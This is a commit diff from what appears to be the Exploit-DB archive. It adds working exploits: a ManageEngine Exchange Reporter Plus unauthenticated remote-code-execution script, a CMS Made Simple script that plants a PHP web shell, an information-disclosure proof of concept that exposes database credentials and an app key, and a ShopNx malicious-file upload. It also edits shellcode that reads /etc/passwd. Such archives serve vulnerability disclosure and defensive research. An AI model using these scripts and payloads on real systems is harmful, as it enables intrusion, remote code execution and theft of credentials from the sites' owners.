DB: 2018-07-05

5 changes to exploits/shellcodes ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution CMS Made Simple 2.2.5 - Remote Code Execution Online Trade - Information Disclosure ShopNx - Arbitrary File Upload
2018-07-05 05:01:52 +00:00 · 2018-07-05 05:01:52 +00:00 · d659af98fd
commit d659af98fd
parent 6a98e55e9d
6 changed files with 278 additions and 2 deletions
--- a/exploits/java/webapps/44975.py
+++ b/exploits/java/webapps/44975.py
@ -0,0 +1,52 @@
+# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE
+# Date: 28-06-2018
+# Software Link: https://www.manageengine.com/products/exchange-reports/
+# Exploit Author: Kacper Szurek
+# Contact: https://twitter.com/KacperSzurek
+# Website: https://security.szurek.pl/
+# YouTube: https://www.youtube.com/c/KacperSzurek
+# Category: remote
+ 
+1. Description
+  
+Java servlet `ADSHACluster` executes `bcp.exe` file which can be passed using `BCP_EXE` param.
+
+https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html
+  
+2. Proof of Concept
+
+```python
+import urllib
+
+file_to_execute = "calc.exe"
+ip = "192.168.1.105" 
+
+def to_hex(s):
+    lst = []
+    for ch in s:
+        hv = hex(ord(ch)).replace('0x', '')
+        if len(hv) == 1:
+            hv = '0'+hv
+        lst.append(hv)
+    
+    return reduce(lambda x,y:x+y, lst)
+
+print "ManageEngine Exchange Reporter Plus <= 5310"
+print "Unauthenticated Remote Code Execution"
+print "by Kacper Szurek"
+print "https://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+print "https://www.youtube.com/c/KacperSzurek"
+
+params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
+f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
+if '{"STATUS":"error"}' in f.read():
+	print "OK"
+else:
+	print "ERROR"
+```
+
+3. Solution:
+   
+Update to version 5311
+https://www.manageengine.com/products/exchange-reports/release-notes.html
--- a/exploits/php/webapps/44976.py
+++ b/exploits/php/webapps/44976.py
@ -0,0 +1,103 @@
+# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
+# Date: 3rd of July, 2018
+# Exploit Author: Mustafa Hasan (@strukt93)
+# Vendor Homepage: http://www.cmsmadesimple.org/
+# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
+# Version: 2.2.5
+# CVE: CVE-2018-1000094
+
+import requests
+import base64
+
+base_url = "http://192.168.1.10/cmsms/admin"
+upload_dir = "/uploads"
+upload_url = base_url.split('/admin')[0] + upload_dir
+username = "admin"
+password = "password"
+
+csrf_param = "__c"
+txt_filename = 'cmsmsrce.txt'
+php_filename = 'shell.php'
+payload = "<?php system($_GET['cmd']);?>"
+
+def parse_csrf_token(location):
+    return location.split(csrf_param + "=")[1]
+
+def authenticate():
+    page = "/login.php"
+    url = base_url + page
+    data = {
+        "username": username,
+        "password": password,
+        "loginsubmit": "Submit"
+    }
+    response  = requests.post(url, data=data, allow_redirects=False)
+    status_code = response.status_code
+    if status_code == 302:
+        print "[+] Authenticated successfully with the supplied credentials"
+        return response.cookies, parse_csrf_token(response.headers['Location'])
+    print "[-] Authentication failed"
+    return None, None
+
+def upload_txt(cookies, csrf_token):
+    mact = "FileManager,m1_,upload,0"
+    page = "/moduleinterface.php"
+    url = base_url + page
+    data = {
+        "mact": mact,
+        csrf_param: csrf_token,
+        "disable_buffer": 1
+    }
+    txt = {
+        'm1_files[]': (txt_filename, payload)
+    }
+    print "[*] Attempting to upload {}...".format(txt_filename)
+    response = requests.post(url, data=data, files=txt, cookies=cookies)
+    status_code = response.status_code
+    if status_code == 200:
+        print "[+] Successfully uploaded {}".format(txt_filename)
+        return True
+    print "[-] An error occurred while uploading {}".format(txt_filename)
+    return None
+
+def copy_to_php(cookies, csrf_token):
+    mact = "FileManager,m1_,fileaction,0"
+    page = "/moduleinterface.php"
+    url = base_url + page
+    b64 = base64.b64encode(txt_filename)
+    serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
+    data = {
+        "mact": mact,
+        csrf_param: csrf_token,
+        "m1_fileactioncopy": "",
+        "m1_path": upload_dir,
+        "m1_selall": serialized,
+        "m1_destdir": "/",
+        "m1_destname": php_filename,
+        "m1_submit": "Copy"
+    }
+    print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
+    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
+    status_code = response.status_code
+    if status_code == 302:
+        if response.headers['Location'].endswith('copysuccess'):
+            print "[+] File copied successfully"
+            return True
+    print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
+    return None    
+
+def quit():
+    print "[-] Exploit failed"
+    exit()
+
+def run():
+    cookies,csrf_token = authenticate()
+    if not cookies:
+        quit()
+    if not upload_txt(cookies, csrf_token):
+        quit()
+    if not copy_to_php(cookies, csrf_token):
+        quit()
+    print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
+
+run()
--- a/exploits/php/webapps/44977.txt
+++ b/exploits/php/webapps/44977.txt
@ -0,0 +1,62 @@
+# Exploit Title: Online Trade 1 - Information Disclosure
+# Date: 2018-07-03
+# Exploit Author: L0RD
+# Vendor Homepage:
+https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?s_rank=14
+# CVE: CVE-2018-12908
+# Version: 1
+# Tested on: Win 10
+=======================================
+# Description :
+Online trading and cryptocurrency investment system 1 allows
+information disclosure by appending /dashboard/deposit.
+The following path contains database credentials and other information
+(username , password , database_name etc).
+
+# POC :
+
+# Request :
+===================
+GET /dashboard/deposit HTTP/1.1
+Host: trade.brynamics.xyz
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+===================
+# Response :
+===================
+HTTP/1.1 405 Method Not Allowed
+Date: Tue, 12 Jun 2018 21:21:45 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.30
+allow: POST
+Cache-Control: no-cache, private
+Content-Type: text/html; charset=UTF-8
+Content-Length: 371161
+
+<td>APP_ENV</td><span class=sf-dump-str title="5
+characters">local</span></td>
+<td>APP_KEY</td><span class=sf-dump-str title="51
+characters">base64:NyL/WHTpZ0IhYKu7hHAzpF/Pvqn7+dD87tgpVvvEZrg=</span></td>
+<td>APP_URL</td><span class=sf-dump-str title="16 characters">
+http://localhost</span></td>
+<td>DB_CONNECTION</td><span class=sf-dump-str title="5
+characters">mysql</span></td>
+<td>DB_HOST</td><span class=sf-dump-str title="9
+characters">127.0.0.1</span></td>
+<td>DB_PORT</td><span class=sf-dump-str title="4
+characters">3306</span></td>
+<td>DB_DATABASE</td><span class=sf-dump-str title="14
+characters">torrpgug_trade</span></td>
+<td>DB_USERNAME</td><span class=sf-dump-str title="15
+characters">torrpgug_p2pguy</span></td>
+<td>DB_PASSWORD</td><span class=sf-dump-str title="15
+characters">undisputed@2017</span></td>
+<td>MAIL_HOST</td><span class=sf-dump-str title="16 characters">
+smtp.mailtrap.io</span></td>
+<td>MAIL_PORT</td><span class=sf-dump-str title="4 characters">2525</span>
+========================================
--- a/exploits/php/webapps/44978.txt
+++ b/exploits/php/webapps/44978.txt
@ -0,0 +1,54 @@
+# Exploit Title: ShopNx - Angular5 Single Page Shopping Cart Application 1 - Arbitrary File Upload
+# Date: 2018-07-03
+# Exploit Author: L0RD
+# Email: borna.nematzadeh123@gmail.com
+# Vendor Homepage: http://codenx.com/
+# Version: 1
+# CVE: CVE-2018-12519
+# Tested on: Win 10
+===================================================
+# Description :
+ShopNx 1 is an Angular 5 single page application which suffers from
+arbitrary file upload vulnerability .
+Attacker can upload malicious files on server because
+the application fails to sufficiently sanitize user-supplied input.
+
+# POC :
+1) Login as a regular user and navigate to "edit profile"
+2) Click on "Avatar" and upload your HTML file which contains malicious javascript code.
+3) You can find your uploaded file here :
+   Path : http://shop.codenx.com/uploads/[Your File]
+
+
+# Request :
+=========================
+POST /api/media HTTP/1.1
+Host: site.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site.com/account/edit-profile
+Content-Length: 367
+Content-Type: multipart/form-data;
+boundary=---------------------------31031276124582
+Connection: keep-alive
+
+-----------------------------31031276124582
+Content-Disposition: form-data; name="file"; filename="file.html"
+Content-Type: text/html
+
+<html>
+<head>
+<title>TEST</title>
+</head>
+<body>
+    <script>
+        console.log(document.cookie);
+    </script>
+</body>
+</html>
+-----------------------------31031276124582--
+
+====================================================
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -39619,3 +39619,7 @@ id,file,description,date,author,type,platform,port
 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
 44970,exploits/linux/webapps/44970.txt,"ModSecurity 3.0.0 - Cross-Site Scripting",2018-07-03,"Adipta Basu",webapps,linux,
 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
+44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
+44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
+44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
+44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
--- a/shellcodes/linux_x86/44963.c
+++ b/shellcodes/linux_x86/44963.c
@ -3,7 +3,8 @@
 # Author: Anurag Srivastava
 # Tested on: i686 GNU/Linux
 # Shellcode Length: 37
-#Greetz - Manish Kishan Tanwar,Kishan Sharma,Vardan,Himanshu,Ravi and Spirited w0lf
+# Student -ID: SLAE-1219
+#Greetz - Manish Kishan Tanwar,Kishan Sharma,Vardan,Adhokshaj,Himanshu,Ravi and Spirited w0lf
 
 Disassembly of section .text:

@ -32,7 +33,7 @@ Disassembly of section .text:
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
-"\x29\xc9\x51\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x51\x68\x73\x73\x77\x64\x68\x$
+"\x29\xc9\x51\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x6a\x0b\x58\x6a\x00\x51\x53\x89\xe1\xcd\x80";
 main()
 {
 printf("Shellcode Length:  %d\n", strlen(code));